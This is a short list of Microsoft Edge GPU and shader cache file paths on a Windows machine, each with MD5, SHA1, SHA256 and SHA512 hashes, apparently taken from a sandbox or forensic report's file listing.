C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

MD5 d2de47009fe9073bd140ecb1429e6f0d
SHA1 a1a77144c3ffe60de38eb5daecccdc7bf1d1eced
SHA256 d6eea1ffa740c7842deed381ad338175ec14fecd7ca25245342ca8930ffd0b79
SHA512 bcd47e091e7309d98c4cabeb782aaecd1e909c61b6254b78dfbb5a9bd1b2c78aac2359514322e82cff3cc7e3e2666161c4e544255495182eef694f87c2e5f409

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001

MD5 1ac9e744574f723e217fb139ef1e86a9
SHA1 4194dce485bd10f2a030d2499da5c796dd12630f
SHA256 4564be03e04002c5f6eaeaea0aff16c5d0bbdad45359aef64f4c199cda8b195e
SHA512 b8515fb4b9470a7ce678331bbd59f44da47b627f87ea5a30d92ec1c6d583f1607539cd9318a5bccf0a0c6c2bd2637992e0519bd37acdf876f7a11ed184fb5109

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002

MD5 a33b3a3fdf5161be5bd861804961f557
SHA1 68a57897f1686a3e62ce9808165e18f31661d077
SHA256 ac33d8bc6d9a5e769472877d7dd3d035f8088274b886b16cb1898b106da48560
SHA512 c94c29a5a9da89044504fe06702f00a7fdd5bc7b85e1733c0cc9a363a812c8d8f95672ea7731643229fa4ae2f1a632c73096d90b63799f5bae7639b41151ccb3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000003

MD5 d9ab25168f8f536fdf8f92202c6ac060
SHA1 789fa090b18ed4195528196cb8883840fb86c801
SHA256 2d4f19e670e3081e0039b061c8d80c8037605d5f8a01a9bd58c4ed1537a253c3
SHA512 04edad29dd23e2d5f5d5242cf4d98f35f71100e63eacc4ba297736a944155e96e458f1ec0c08d5cf53ab50031ba4fa06f07b1b349062ff896d8e2134afc48b79